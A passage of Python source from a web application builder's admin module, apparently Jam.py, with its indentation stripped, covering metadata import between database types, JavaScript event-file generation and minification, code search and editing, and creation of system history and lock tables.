elif old_db_type == db_modules.FIREBIRD:
desc = field_list[0][1]
it.descending.value = desc
it.f_fields_list.value = common.store_index_fields(field_list)
it.post()
def update_item_idents(new_dict, item_name, field_names, old_case, new_case):
item = new_dict[item_name]
fields = []
for field_name in field_names:
fields.append(item.field_by_name(field_name))
item.log_changes = False
for it in item:
it.edit()
for field in fields:
if new_case(field.value) == field.value and not field.value.upper() in common.SQL_KEYWORDS:
field.value = old_case(field.value)
it.post()
def update_idents(new_dict, new_db_type, old_db_type):
new_case = db_modules.get_db_module(new_db_type).identifier_case
old_case = db_modules.get_db_module(old_db_type).identifier_case
if old_case('a') != new_case('a'):
update_item_idents(new_dict, 'sys_items', ['f_table_name', 'f_gen_name'], old_case, new_case)
update_item_idents(new_dict, 'sys_fields', ['f_db_field_name'], old_case, new_case)
update_item_idents(new_dict, 'sys_indices', ['f_index_name'], old_case, new_case)
update_indexes(new_dict, new_db_type, old_db_type)
def get_fk_ind():
fk = {}
if db_type == db_modules.SQLITE:
indexes = new_dict['sys_indices']
for ind in indexes:
if ind.f_foreign_index.value:
dic = get_foreign_key_dict(ind)
if not fk.get(ind.owner_rec_id.value):
fk[ind.owner_rec_id.value] = []
fk[ind.owner_rec_id.value].append(dic)
return fk
def analize(dir, db_type):
try:
fk_ind = get_fk_ind() # SQLITE only
error = ''
db_sql = []
adm_sql = []
deltas = {}
delta = get_delta('sys_indices', options=['delete'])
for d in delta:
table_name = get_table_name(d.owner_rec_id.value)
if table_name:
db_sql.append(indices_delete_sql(task.sys_indices, d))
adm_sql.append(delta.apply_sql())
delta = get_delta('sys_items', 'sys_fields')
check_generator(task.sys_items, delta)
for d in delta:
if d.rec_inserted():
db_sql.append(items_insert_sql(task.sys_items, d,
new_fields=get_new_fields(d.id.value),
foreign_fields=fk_ind.get(d.id.value)))
elif d.rec_modified():
db_sql.append(items_update_sql(task.sys_items, d))
elif d.rec_deleted():
db_sql.append(items_delete_sql(task.sys_items, d))
refresh_old_item(old_dict['sys_items'])
delta = get_delta('sys_items')
check_generator(task.sys_items, delta)
adm_sql.append(delta.apply_sql())
refresh_old_item(old_dict['sys_fields'])
delta = get_delta('sys_fields')
adm_sql.append(delta.apply_sql())
refresh_old_item(old_dict['sys_indices'])
delta = get_delta('sys_indices', options=['update', 'insert'])
for d in delta:
table_name = get_table_name(d.owner_rec_id.value)
if table_name:
if d.rec_inserted():
db_sql.append(indices_insert_sql(task.sys_indices, d, table_name,
get_new_fields(d.owner_rec_id.value),
foreign_key_dict=get_foreign_key_dict(d)))
elif d.rec_deleted():
db_sql.append(indices_delete_sql(task.sys_indices, d))
adm_sql.append(delta.apply_sql())
delta = get_delta('sys_filters')
adm_sql.append(delta.apply_sql())
delta = get_delta('sys_report_params')
adm_sql.append(delta.apply_sql())
delta = get_delta('sys_roles')
adm_sql.append(delta.apply_sql())
delta = get_delta('sys_params')
adm_sql.append(delta.apply_sql())
delta = get_delta('sys_privileges')
adm_sql.append(delta.apply_sql())
delta = get_delta('sys_lookup_lists')
adm_sql.append(delta.apply_sql())
except Exception as e:
error = traceback.format_exc()
print('Import error: %s' % error)
return error, db_sql, adm_sql
def reload_utils():
utils_folder = os.path.join(task.work_dir, 'utils')
if os.path.exists(utils_folder):
for dirpath, dirnames, filenames in os.walk(utils_folder):
for file_name in filenames:
name, ext = os.path.splitext(file_name)
if ext == '.py':
relpath = os.path.join(os.path.relpath(dirpath, task.work_dir), name)
module_name = '.'.join(relpath.split(os.sep))
module = sys.modules.get(module_name)
if module:
try:
reload(module)
except Exception as e:
print('%s %s' % (module_name, e))
def project_empty():
items = task.sys_items.copy(handlers=False)
items.set_where(task_id=task_id)
items.open(fields=['id', 'f_table_name'])
for i in items:
if i.f_table_name.value:
return False
return True
error = ''
task.__import_message = ''
def info_from_error(err):
arr = str(err).split('\\n')
error = '<br>'.join(arr)
return '<div class="text-error">%s</div>' % error
def show_progress(string):
print(string)
task.__import_message += '<h5>' + string + '</h5>'
def show_info(info):
task.__import_message += '<div style="margin-left: 30px;">' + info + '</div>'
db_type = get_db_type(task)
if db_type == db_modules.SQLITE and not project_empty():
error = 'Metadata can not be imported into an existing SQLITE project'
show_progress(error)
return False, error, task.__import_message
task.app.under_maintenance = True
success = False
try:
request_count = 0
if from_client:
request_count = 1
file_name = os.path.join(to_unicode(os.getcwd(), 'utf-8'), os.path.normpath(file_name))
show_progress(task.language('import_reading_data'))
dir = copy_tmp_files(file_name)
new_dict, old_dict, new_db_type = get_items(dir)
if new_db_type != db_type:
update_idents(new_dict, new_db_type, db_type)
show_progress(task.language('import_checking_integrity'))
error = check_items()
info = ''
if error:
show_info(error)
else:
show_progress(task.language('import_analyzing'))
error, db_sql, adm_sql = analize(dir, db_type)
if error:
show_info(error)
if not error:
success = True
show_progress(task.language('import_waiting_close'))
while True:
i = 0
if task.app._busy > request_count:
time.sleep(0.1)
i += 1
if i > 3000:
break
else:
break
if len(db_sql):
show_progress(task.language('import_changing_db'))
success, error, info = execute_ddl(task, db_sql)
show_info(info)
if success:
show_progress(task.language('import_changing_admin'))
result, error = task.execute(adm_sql)
if error:
success = False
if success:
show_progress(task.language('import_copying'))
copy_files(dir)
if success:
read_setting(task)
reload_utils()
read_setting(task)
load_task(task.app.task, task.app, first_build=False, after_import=True)
task.app.privileges = None
task.app.task.mod_count += 1
update_events_code(task)
except Exception as e:
try:
success = False
error = str(e)
if os.name != 'nt':
trb = info_from_error(error)
error = trb
print(error)
show_info(error)
except:
pass
finally:
try:
show_progress(task.language('import_deleteing_files'))
delete_tmp_files(dir)
except:
pass
try:
os.remove(file_name)
except:
pass
task.app.under_maintenance = False
return success, error, task.__import_message
def get_module_names_dict(task, task_id):
def find_module_name(dic, id_value):
lst = dic[id_value]
if id_value != task_id:
parent = lst[0]
else:
parent = 0
if parent:
plst = dic[parent]
if not plst[2]:
plst[2] = find_module_name(dic, parent)
lst[2] = plst[2] + '.' + lst[1]
else:
lst[2] = lst[1]
return lst[2]
items = task.sys_items.copy(handlers=False)
items.set_where(task_id=task_id)
items.set_order_by('id')
items.open()
d = {}
for item in items:
d[item.id.value] = [item.parent.value, item.f_item_name.value, '']
result = {}
for item in items:
result[item.id.value] = find_module_name(d, item.id.value)
return result
def server_find_in_task(task, task_id, search_text, case_sencitive, whole_words):
try:
search_text = search_text.decode("utf-8")
except:
pass
if not case_sencitive:
search_text = search_text.upper()
def is_whole_word(line, pos, search_text):
if pos > 0:
ch = line[pos - 1]
if ch.isalpha() or ch == '_':
return False
if pos + len(search_text) < len(line):
ch = line[pos + len(search_text)]
if ch.isalpha() or ch == '_':
return False
return True
def find_in_text(text, search_text, module_name):
result = []
if text:
lines = text.splitlines()
for i, l in enumerate(lines):
line = l
if not case_sencitive:
line = l.upper()
pos = line.find(search_text)
if pos > -1:
if whole_words and not is_whole_word(line, pos, search_text):
continue
result.append((module_name, i + 1, l.strip()))
return result
def find_in_type(header, module_type):
search = ''
result = []
for it in items:
if module_type == common.CLIENT_MODULE:
text = it.f_client_module.value
elif module_type == common.WEB_CLIENT_MODULE:
text = it.f_web_client_module.value
elif module_type == common.SERVER_MODULE:
text = it.f_server_module.value
result += find_in_text(text, search_text, names_dict[it.id.value])
result = sorted(result, key=itemgetter(0, 1, 2))
for line in result:
search += '%s:%s: %s\n' % line
if header:
search = header + '\n' + search
return search + '\n'
names_dict = get_module_names_dict(task, task_id)
items = task.sys_items.copy(handlers=False)
items.set_where(task_id=task_id)
items.open(fields=['id', 'f_item_name', 'f_web_client_module', 'f_server_module'])
result = {'client': find_in_type('', common.WEB_CLIENT_MODULE),
'server': find_in_type('', common.SERVER_MODULE)}
return result
def server_web_print_code(task, task_id):
def add_detail_code(item, module_type):
for child in children:
if child.table_id.value == item.id.value:
add_code(child, module_type)
def add_code(item, module_type):
if module_type == common.WEB_CLIENT_MODULE:
name = 'client'
code = item.f_web_client_module.value
else:
name = 'server'
code = item.f_server_module.value
if code and len(code):
result[name].append([names_dict[item.id.value], code])
add_detail_code(item, module_type)
result = {}
names_dict = get_module_names_dict(task, task_id)
children = task.sys_items.copy()
children.set_where(table_id__gt=0)
children.open()
items = task.sys_items.copy()
items.set_where(task_id=task_id)
items.open()
items.locate('id', task_id)
result['task'] = items.f_name.value
result['client'] = []
result['server'] = []
for it in items:
if not it.table_id.value:
add_code(items, common.WEB_CLIENT_MODULE)
add_code(items, common.SERVER_MODULE)
return result
def update_events_code(task):
def process_events(code, js_funcs, ID, path):
script = ''
if code:
script += '\nfunction Events%s() { // %s \n\n' % (ID, path)
code = '\t' + code.replace('\n', '\n\t')
code = code.replace(' ', '\t')
script += code
if js_funcs:
script += js_funcs
else:
script += '\n'
script += '}\n\n'
script += 'task.events.events%s = new Events%s();\n' % (ID, ID)
return script
def get_js_path(it):
def get_parent_name(id_value, l):
tp = name_dict.get(id_value)
if tp:
parent, type_id, name, external = tp
l.insert(0, name)
get_parent_name(parent, l)
l = []
l.append(it.f_item_name.value)
get_parent_name(it.parent.value, l)
return '.'.join(l)
def get_external(it):
external = it.f_js_external.value
if it.type_id.value == common.DETAIL_TYPE:
parent, type_id, name, parent_external = name_dict.get(it.parent.value)
external = parent_external
return external
def update_task(item):
js_filename = js_filenames.get(item.ID, '')
item.js_filename = js_filename
def get_js_file_name(js_path):
return js_path + '.js'
single_file = common.SETTINGS['SINGLE_FILE_JS']
name_dict = {}
js_filenames = {}
it = task.sys_items.copy(handlers=False, details=False)
it.set_where(type_id=common.TASK_TYPE)
it.set_order_by('type_id')
it.open()
task_id = it.task_id.value
it.set_where(task_id=task_id)
it.open(fields=['id', 'parent', 'type_id', 'f_name', 'f_item_name', 'f_js_filename', 'f_js_external', 'f_web_client_module', 'f_js_funcs'])
script_start = '(function($, task) {\n"use strict";\n'
script_end = '\n})(jQuery, task)'
script_common = ''
for it in it:
js_path = get_js_path(it)
js_filename = get_js_file_name(js_path)
file_name = os.path.join(to_unicode(os.getcwd(), 'utf-8'), 'js', js_filename)
if os.path.exists(file_name):
os.remove(file_name)
min_file_name = get_minified_name(file_name)
if os.path.exists(min_file_name):
os.remove(min_file_name)
name_dict[it.id.value] = [it.parent.value, it.type_id.value, it.f_item_name.value, it.f_js_external.value]
code = it.f_web_client_module.value
js_funcs = it.f_js_funcs.value
cur_js_filename = ''
if code:
code = code.strip()
if code:
script = process_events(code, js_funcs, it.id.value, js_path)
external = get_external(it)
if single_file and not external:
script_common += script
else:
script = script_start + script + script_end
cur_js_filename = js_filename
file_write(file_name, script)
if common.SETTINGS['COMPRESSED_JS']:
minify(file_name)
js_filenames[it.id.value] = cur_js_filename
if single_file:
it.first()
js_file_name = get_js_file_name(it.f_item_name.value)
js_filenames[it.id.value] = js_file_name
script = script_start + script_common + script_end
file_name = os.path.join(to_unicode(os.getcwd(), 'utf-8'), 'js', js_file_name)
file_write(file_name, script)
if common.SETTINGS['COMPRESSED_JS']:
minify(file_name)
sql = []
for key, value in iteritems(js_filenames):
sql.append("UPDATE %s SET F_JS_FILENAME = '%s' WHERE ID = %s" % (it.table_name, value, key))
it.task.execute(sql)
if it.task.app.task:
it.task.app.task.all(update_task)
try:
from utils.js_code import update_js
update_js(task)
except:
pass
def get_minified_name(file_name):
result = file_name
head, tail = os.path.split(file_name)
name, ext = os.path.splitext(tail)
if (ext in ['.js', '.css']):
result = os.path.join(head, '%s.min%s' % (name, ext))
return result
def minify(file_name):
min_file_name = get_minified_name(file_name)
from jam.third_party.jsmin import jsmin
text = file_read(file_name)
file_write(min_file_name, jsmin(text))
def get_field_dict(task, item_id, parent_id, type_id, table_id):
result = {}
if type_id in [common.ITEM_TYPE, common.TABLE_TYPE, common.DETAIL_TYPE]:
fields = task.sys_fields.copy()
if table_id:
fields.filters.owner_rec_id.value = [table_id, task.sys_items.field_by_id(table_id, 'parent')]
else:
fields.filters.owner_rec_id.value = [item_id, parent_id]
fields.open()
for f in fields:
if f.f_field_name.value.lower() != 'deleted':
result[f.f_field_name.value] = None
return result
def server_get_task_dict(task):
def get_children(items, id_value, type_id, dict, key, parent_id, item_fields):
childs = {}
if type_id in (common.TASK_TYPE, common.ITEMS_TYPE,
common.TABLES_TYPE, common.REPORTS_TYPE):
for it in items:
if it.parent.value == id_value:
clone = items.clone()
get_children(clone, it.id.value, it.type_id.value, childs, it.f_item_name.value, it.parent.value, item_fields)
else:
fields = []
f = f_dict.get(id_value)
if f:
fields += f
f = f_dict.get(parent_id)
if f:
fields += f
for f in fields:
childs[f] = None
item_fields[id_value] = childs
dict[key] = childs
it = task.sys_items.copy(handlers=False)
it.set_where(type_id=common.TASK_TYPE)
it.open()
task_id = it.id.value
result = {}
f_dict = {}
items = task.sys_items.copy(handlers=False)
items.details_active = False
items.open(fields=['id', 'type_id', 'parent', 'f_item_name'])
fields = task.sys_fields.copy(handlers=False)
fields.open(fields=['owner_rec_id', 'f_field_name'])
for f in fields:
if f.f_field_name.value.lower() != 'deleted':
d = f_dict.get(f.owner_rec_id.value, [])
if not d:
f_dict[f.owner_rec_id.value] = d
d.append(f.f_field_name.value)
params = task.sys_report_params.copy(handlers=False)
params.open(fields=['owner_rec_id', 'f_param_name'])
for f in params:
d = f_dict.get(f.owner_rec_id.value, [])
if not d:
f_dict[f.owner_rec_id.value] = d
d.append(f.f_param_name.value)
item_fields = {}
get_children(items, task_id, common.TASK_TYPE, result, 'task', None, item_fields)
return result['task'], item_fields
def server_item_info(task, item_id, is_server):
result = {}
items = task.sys_items.copy()
items.set_where(id=item_id)
items.open()
type_id = items.type_id.value
parent_id = items.parent.value
task_id = items.task_id.value
table_id = items.table_id.value
item_name = items.f_item_name.value
if table_id:
parent = task.sys_items.copy()
parent.set_where(id=parent_id)
parent.open()
item_name = parent.f_item_name.value + '.' + item_name
tag = item_name.replace('.', '-')
if is_server:
code = items.f_server_module.value
ext = 'py'
doc_type = 'server'
tag = tag + '-server'
else:
code = items.f_web_client_module.value
ext = 'js'
doc_type = 'client'
tag = tag + '-client'
if not code:
code = ''
result['fields'] = get_field_dict(task, item_id, parent_id, type_id, table_id)
result['task'] = {} #server_get_task_dict(task)
result['events'] = get_events(type_id, is_server)
result['module'] = common.get_funcs_info(code, is_server)
result['name'] = '%s.%s' % (item_name, ext)
result['ext'] = ext
result['doc'] = code
result['doc_type'] = doc_type
result['rec_id'] = item_id
result['type'] = doc_type
result['tag'] = tag
return result
def parse_js(code):
script = ''
ast = parseScript(to_unicode(code, 'utf-8'))
for e in ast.body:
if isinstance(e, nodes.FunctionDeclaration):
script += '\tthis.%s = %s;\n' % (e.id.name, e.id.name)
if script:
script = '\n' + script
return script
def server_save_edit(task, item_id, text, is_server):
code = text
text = to_bytes(text, 'utf-8')
line = None
error = ''
module_info = None
module_type = common.WEB_CLIENT_MODULE
if is_server:
module_type = common.SERVER_MODULE
if is_server:
try:
compile(text, 'check_item_code', "exec")
except Exception as e:
try:
line = e.args[1][1]
col = e.args[1][2]
if line and col:
error = ' %s - line %d col %d' % (e.args[0], line, col)
elif line:
error = ' %s - line %d col %d' % (e.args[0], line)
else:
error = e.args[0]
except:
error = str(e).replace('check_item_code, ', '')
traceback.print_exc()
else:
try:
js_funcs = parse_js(text)
except Exception as e:
try:
err_str = e.args[0]
line, err = err_str.split(':')
try:
line = int(line[5:])
except:
pass
error = err_str
except:
error = error_message(e)
traceback.print_exc()
if not error:
try:
item = task.sys_items.copy()
item.set_where(id=item_id)
item.open(fields=['id', 'f_server_module', 'f_web_client_module', 'f_js_funcs'])
if item.record_count() == 1:
item.edit()
if is_server:
item.f_server_module.value = code
else:
item.f_web_client_module.value = code
item.f_js_funcs.value = js_funcs
item.post()
item.apply()
module_info = common.get_funcs_info(code, is_server)
else:
error = task.language('item_with_id_not found') % item_id
except Exception as e:
traceback.print_exc()
error = error_message(e)
if is_server:
task.app.task_server_modified = True
else:
task.app.task_client_modified = True
return {'error': error, 'line': line, 'module_info': module_info}
def server_file_info(task, file_name):
result = {}
file_path = file_name
ext = 'html'
if file_name == 'project.css':
ext = 'css'
file_path = os.path.join('css', 'project.css')
if os.path.exists(file_path):
result['doc'] = file_read(file_path)
result['name'] = file_name
result['ext'] = ext
result['type'] = ''
result['tag'] = file_name.replace('.', '-')
return result
def server_save_file(task, file_name, code):
#~ code = to_bytes(code, 'utf-8')
result = {}
error = ''
if file_name == 'project.css':
file_name = os.path.join('css', 'project.css')
file_name = os.path.normpath(file_name)
try:
file_write(file_name, code)
except Exception as e:
traceback.print_exc()
error = error_message(e)
result['error'] = error
if file_name == 'index.html':
change_theme(task)
return result
def server_get_db_options(task, db_type):
error = ''
try:
result = {}
db_module = db_modules.get_db_module(db_type)
result['DATABASE'] = db_module.DATABASE
result['NEED_DATABASE_NAME'] = db_module.NEED_DATABASE_NAME
result['NEED_LOGIN'] = db_module.NEED_LOGIN
result['NEED_PASSWORD'] = db_module.NEED_PASSWORD
result['NEED_ENCODING'] = db_module.NEED_ENCODING
result['NEED_HOST'] = db_module.NEED_HOST
result['NEED_PORT'] = db_module.NEED_PORT
result['CAN_CHANGE_TYPE'] = db_module.CAN_CHANGE_TYPE
result['CAN_CHANGE_SIZE'] = db_module.CAN_CHANGE_SIZE
result['NEED_GENERATOR'] = db_module.NEED_GENERATOR
if hasattr(db_module, 'get_table_info'):
result['IMPORT_SUPPORT'] = True
return result, error
except Exception as e:
return None, str(e)
def server_get_task_info(task):
items = task.sys_items.copy()
items.set_where(type_id=common.TASK_TYPE)
items.open(fields=['f_item_name', 'f_name'])
task_name = items.f_item_name.value;
task_caption = items.f_name.value;
params = task.sys_params.copy()
params.open()
task_version = '%s / %s' % (params.f_version.value, task.app.jam_version)
tasks = task.sys_tasks.copy()
tasks.open()
task_db = tasks.f_alias.value
return task_name, task_caption, task_version, task_db, task.app.started
def server_can_delete_lookup_list(task, list_id):
fields = task.sys_fields.copy()
fields.set_where(f_lookup_values=list_id)
fields.open()
used = []
for f in fields:
used.append({'field1': task.sys_items.field_by_id(f.owner_rec_id.value, 'f_item_name'), 'field2': f.f_field_name.value})
if len(used) != 0:
names = ',<br>'.join([task.language('field_mess') % use for use in used])
mess = task.language('lookup_list_is_used_in') % names
return mess
def server_valid_item_name(task, item_id, parent_id, name, type_id):
result = ''
items = task.sys_items.copy(handlers=False, details=False)
if name.upper() in ['SYSTEM', 'HISTORY']:
items.set_where(id=item_id)
items.open()
if items.f_item_name.value.upper() != name.upper():
result = task.language('reserved_word')
elif type_id == common.DETAIL_TYPE:
items.set_where(parent=parent_id)
items.open()
for it in items:
if it.task_id.value and it.id.value != item_id and it.f_item_name.value.upper() == name.upper():
result = 'There is an item with this name'
break
else:
items = task.sys_items.copy(handlers=False, details=False)
items.set_where(type_id__ne=common.DETAIL_TYPE)
items.open()
for it in items:
if it.task_id.value and it.id.value != item_id and it.f_item_name.value.upper() == name.upper():
result = 'There is an item with this name'
break
return result
def server_create_task(task):
db_type, db_server, db_database, db_user, db_password, db_host, db_port, db_encoding = db_info(task)
db_module = db_modules.get_db_module(db_type)
fields = task.sys_fields.copy(handlers=False)
fields.open()
for f in fields:
if f.f_db_field_name.value:
f.edit()
f.f_db_field_name.value = db_module.identifier_case(f.f_db_field_name.value)
f.post()
fields.apply()
task.create_task()
def get_lookup_list(task, list_id):
lists = task.sys_lookup_lists.copy()
lists.set_where(id=list_id)
lists.open()
return json.loads(lists.f_lookup_values_text.value)
def change_theme(task):
rlist = []
#~ prefix = '/css/'
prefix = ''
theme = common.THEME_FILE[common.SETTINGS['THEME']]
for t in common.THEME_FILE:
if t and t != theme:
rlist.append((t, theme))
if common.SETTINGS['SMALL_FONT']:
rlist.append(('jam.css', 'jam12.css'))
else:
rlist.append(('jam12.css', 'jam.css'))
file_name = os.path.join(task.work_dir, 'index.html')
content = file_read(file_name)
for r1, r2 in rlist:
content = content.replace(prefix + r1, prefix + r2)
file_write(file_name, content)
def do_on_apply_param_changes(item, delta, params):
task = item.task
language = common.SETTINGS['LANGUAGE']
debugging = common.SETTINGS['DEBUGGING']
safe_mode = common.SETTINGS['SAFE_MODE']
single_file_js = common.SETTINGS['SINGLE_FILE_JS']
compressed_js = common.SETTINGS['COMPRESSED_JS']
theme = common.SETTINGS['THEME']
small_font = common.SETTINGS['SMALL_FONT']
sql = delta.apply_sql()
result = item.task.execute(sql)
read_setting(task)
if compressed_js != common.SETTINGS['COMPRESSED_JS']:
task.app.task_client_modified = True
if single_file_js != common.SETTINGS['SINGLE_FILE_JS']:
task.app.task_client_modified = True
task.app.task_server_modified = True
if safe_mode != common.SETTINGS['SAFE_MODE']:
task.safe_mode = common.SETTINGS['SAFE_MODE']
task.app.users = {}
if language != common.SETTINGS['LANGUAGE']:
task.set_language(common.SETTINGS['LANGUAGE'])
init_admin(task)
if theme != common.SETTINGS['THEME'] or small_font != common.SETTINGS['SMALL_FONT']:
change_theme(task)
task.timeout = common.SETTINGS['TIMEOUT']
task.ignore_change_ip = common.SETTINGS['IGNORE_CHANGE_IP']
return result
def init_fields_next_id(task):
con = task.create_connection()
try:
cursor = con.cursor()
cursor.execute('SELECT MAX(ID) FROM SYS_FIELDS')
res = cursor.fetchall()
max_id = res[0][0]
if not max_id:
max_id = 0
cursor.execute('UPDATE SYS_PARAMS SET F_FIELD_ID_GEN=%s' % max_id)
con.commit()
finally:
con.close()
def get_fields_next_id(task, length=1):
with task.fields_id_lock:
params = task.sys_params.copy()
params.open()
cur_id = params.f_field_id_gen.value
params.edit()
params.f_field_id_gen.value = cur_id + length
params.post()
params.apply()
return cur_id + 1
def server_get_table_names(task):
db_type, db_server, db_database, db_user, db_password, db_host, db_port, db_encoding = db_info(task)
db_module = db_modules.get_db_module(db_type)
connection = db_module.connect(db_database, db_user, db_password, db_host, db_port, db_encoding, db_server)
try:
tables = db_module.get_table_names(connection)
tables = [t.strip() for t in tables]
ex_tables = task.select('SELECT F_TABLE_NAME FROM SYS_ITEMS')
ex_tables = [t[0].upper() for t in ex_tables if t[0]]
result = [t for t in tables if not t.upper() in ex_tables]
result.sort()
except:
result = []
finally:
connection.close()
return result
def server_import_table(task, table_name):
db_type, db_server, db_database, db_user, db_password, db_host, db_port, db_encoding = db_info(task)
db_module = db_modules.get_db_module(db_type)
connection = db_module.connect(db_database, db_user, db_password, db_host, db_port, db_encoding, db_server)
try:
result = db_module.get_table_info(connection, table_name, db_database)
finally:
connection.close()
return result
def server_get_primary_key_type(task, lookup_item_id):
items = task.sys_items.copy()
items.set_where(id=lookup_item_id)
items.open()
if items.record_count():
primary_field_id = items.f_primary_key.value
fields = task.sys_fields.copy()
fields.set_where(id=primary_field_id)
fields.set_fields('id', 'f_field_name', 'f_data_type', 'f_size')
fields.open()
if fields.record_count():
return {'field_id': fields.id.value, 'field_name': fields.f_field_name.value,
'data_type': fields.f_data_type.value, 'size': fields.f_size.value}
return None, None
def server_set_literal_case(task, name):
db_type, db_server, db_database, db_user, db_password, db_host, db_port, db_encoding = db_info(task)
db_module = db_modules.get_db_module(db_type)
return db_module.identifier_case(name)
def get_new_table_name(task, var_name):
db_type, db_server, db_database, db_user, db_password, db_host, db_port, db_encoding = db_info(task)
db_module = db_modules.get_db_module(db_type)
copy = task.sys_items.copy(handlers=False, details=False)
copy.set_where(type_id=common.TASK_TYPE)
copy.open();
if copy.record_count() == 1:
name = copy.f_item_name.value + '_' + var_name;
gen_name = ''
if db_module.NEED_GENERATOR:
gen_name = name + '_SEQ'
return [db_module.identifier_case(name), db_module.identifier_case(gen_name)]
def create_system_item(task, field_name):
def check_item_name(name):
items = task.sys_items.copy()
items.open(fields = ['id', 'f_item_name'])
i = 1
cur_name = name
while True:
if items.locate('f_item_name', cur_name):
cur_name = name + str(i)
i += 1
else:
break
return cur_name
error = ''
result = ''
try:
items = task.sys_items.copy()
items.set_where(type_id=common.TASK_TYPE)
items.open(fields = ['id', 'type_id', 'f_item_name'])
task_id = items.id.value
task_name = items.f_item_name.value
items = task.sys_items.copy()
items.open(open_empty=True, fields = ['id', 'parent', 'task_id', \
'type_id', 'f_name', 'f_item_name', 'f_table_name', \
'f_gen_name', 'f_primary_key'])
sys_group = None
params = task.sys_params.copy()
task.sys_params.open(fields=['id', 'f_sys_group', 'f_history_item', 'f_lock_item'])
sys_group = task.sys_params.f_sys_group.value
if sys_group:
items.set_where(id=sys_group)
items.open(fields = ['id', 'f_name', 'f_item_name'])
if not items.record_count():
sys_group = None
else:
items.open(open_empty=True)
items.append()
items.parent.value = task_id
items.task_id.value = task_id
items.type_id.value = common.ITEMS_TYPE
items.f_name.value = task.language('system_group')
items.f_item_name.value = check_item_name('system')
items.f_index.value = '999999'
items.post()
items.apply()
task.sys_params.edit()
task.sys_params.f_sys_group.value = items.id.value
task.sys_params.post()
task.sys_params.apply()
sys_group = items.id.value
sys_group_name = items.f_name.value
if field_name == 'f_history_item':
name = 'History'
item_name = check_item_name('history')
fields = common.HISTORY_FIELDS
index_fields = common.HISTORY_INDEX_FIELDS
param_field = 'f_history_item'
sys_id = 1
elif field_name == 'f_lock_item':
name = 'Locks'
item_name = check_item_name('locks')
fields = common.LOCKS_FIELDS
index_fields = common.LOCKS_INDEX_FIELDS
param_field = 'f_lock_item'
sys_id = 2
table_name, gen_name = get_new_table_name(task, item_name)
items.open(open_empty=True)
items.append()
items.parent.value = sys_group
items.task_id.value = task_id
items.type_id.value = common.ITEM_TYPE
items.f_name.value = name
items.f_item_name.value = item_name
items.f_table_name.value = table_name
items.f_gen_name.value = None
items.sys_id.value = sys_id
items.sys_fields.open()
for i, f in enumerate(fields):
field_name, data_type, size = f
items.sys_fields.append()
items.sys_fields.id.value = get_fields_next_id(task)
items.sys_fields.task_id.value = task_id
items.sys_fields.f_name.value = field_name
items.sys_fields.f_field_name.value = field_name
items.sys_fields.f_db_field_name.value = server_set_literal_case(task, field_name)
items.sys_fields.f_data_type.value = data_type
items.sys_fields.f_size.value = size
items.sys_fields.post()
if field_name == 'id':
items.f_primary_key.value = items.sys_fields.id.value
items.post()
items.on_apply = items_apply_changes
items.apply(params={'manual_update': False})
sys_item_name = items.f_name.value
dest_list = []
for field_name in index_fields:
items.sys_fields.locate('f_field_name', field_name)
dest_list.append([items.sys_fields.id.value, False])
indexes = task.sys_indices.copy()
indexes.open(open_empty=True)
indexes.append()
indexes.f_index_name.value = task_name.upper() + '_' + items.f_item_name.value.upper() + '_' + 'IDX';
indexes.task_id.value = task_id
indexes.owner_rec_id.value = items.id.value
indexes.f_foreign_index.value = False
indexes.f_fields_list.value = server_dump_index_fields(indexes, dest_list)
indexes.post()
indexes.on_apply = indices_apply_changes
indexes.apply(params={'manual_update': False})
task.sys_params.edit()
task.sys_params.field_by_name(param_field).value = items.id.value
task.sys_params.post()
task.sys_params.apply()
except Exception as e:
traceback.print_exc()
error = 'While creating an item the following error was raised: %s' % e
if not error:
result = 'The %s item has been created in the %s group. The Application builder will be reloaded.' % \
(sys_item_name, sys_group_name)
return result, error
def indexes_get_table_names(indexes):
ids = []
for i in indexes:
ids.append(i.owner_rec_id.value)
items = indexes.task.sys_items.copy(handlers=False)
items.set_where(id__in=ids)
items.open(fields=['id', 'f_table_name'])
table_names = {}
for i in items:
table_names[i.id.value] = i.f_table_name.value
return table_names
def drop_indexes_sql(task):
db_type = get_db_type(task)
db_module = db_modules.get_db_module(db_type)
indexes = task.sys_indices.copy(handlers=False)
indexes.open()
table_names = indexes_get_table_names(indexes)
sqls = []
for i in indexes:
if not (i.f_foreign_index.value and db_module.DATABASE == 'SQLITE'):
table_name = table_names.get(i.owner_rec_id.value)
if table_name:
sqls.append(i.delete_index_sql(db_type, table_name))
return sqls
def restore_indexes_sql(task):
db_type = get_db_type(task)
db_module = db_modules.get_db_module(db_type)
indexes = task.sys_indices.copy(handlers=False)
indexes.open()
table_names = indexes_get_table_names(indexes)
sqls = []
for i in indexes:
if not (i.f_foreign_index.value and db_module.DATABASE == 'SQLITE'):
table_name = table_names.get(i.owner_rec_id.value)
if table_name:
sqls.append(i.create_index_sql(db_type, table_name))
return sqls
###############################################################################
# sys_items #
###############################################################################
def get_db_type(task):
tasks = task.sys_tasks.copy()
tasks.open()
return tasks.f_db_type.value
def get_table_fields(item, fields, delta_fields=None):
def field_dict(field):
if not (field.f_calculated.value or field.f_master_field.value):
dic = {}
dic['id'] = field.id.value
dic['field_name'] = field.f_db_field_name.value
dic['data_type'] = field.f_data_type.value
dic['size'] = field.f_size.value
dic['default_value'] = ''#field.f_default_value.value
dic['master_field'] = field.f_master_field.value
dic['primary_key'] = field.id.value == item.f_primary_key.value
return dic
def field_info(fields):
result = []
for field in fields:
if not (field.f_calculated.value or field.f_master_field.value):
dic = field_dict(field)
if dic:
result.append(dic)
return result
def find_field(fields_info, field_id):
for field in fields_info:
if field['id'] == field_id:
return field
task = item.task
result = []
parent_fields = task.sys_fields.copy()
parent_fields.filters.owner_rec_id.value = [fields.owner.parent.value]
parent_fields.open()
result = field_info(parent_fields) + field_info(fields)
if delta_fields:
for field in delta_fields:
if not (field.f_calculated.value or field.f_master_field.value):
if field.record_status == common.RECORD_INSERTED:
dic = field_dict(field)
if dic:
result.append(dic)
if field.record_status == common.RECORD_DELETED:
field_info = find_field(result, field.id.value)
if field_info:
result.remove(field_info)
elif field.record_status == common.RECORD_MODIFIED:
field_info = find_field(result, field.id.value)
if field_info:
field_info['id'] = field.id.value
field_info['field_name'] = field.f_db_field_name.value
field_info['data_type'] = field.f_data_type.value
field_info['size'] = field.f_size.value
field_info['default_value'] = ''#field.f_default_value.value
else:
dic = field_dict(field)
if dic:
result.append(dic)
elif field.f_master_field.value and field.record_status == common.RECORD_MODIFIED:
field_info = find_field(result, field.id.value)
if field_info and not field_info['master_field']:
result.remove(field_info)
return result
def item_children(task, item_id):
items = task.sys_items.copy()
items.filters.parent.value = item_id
items.open()
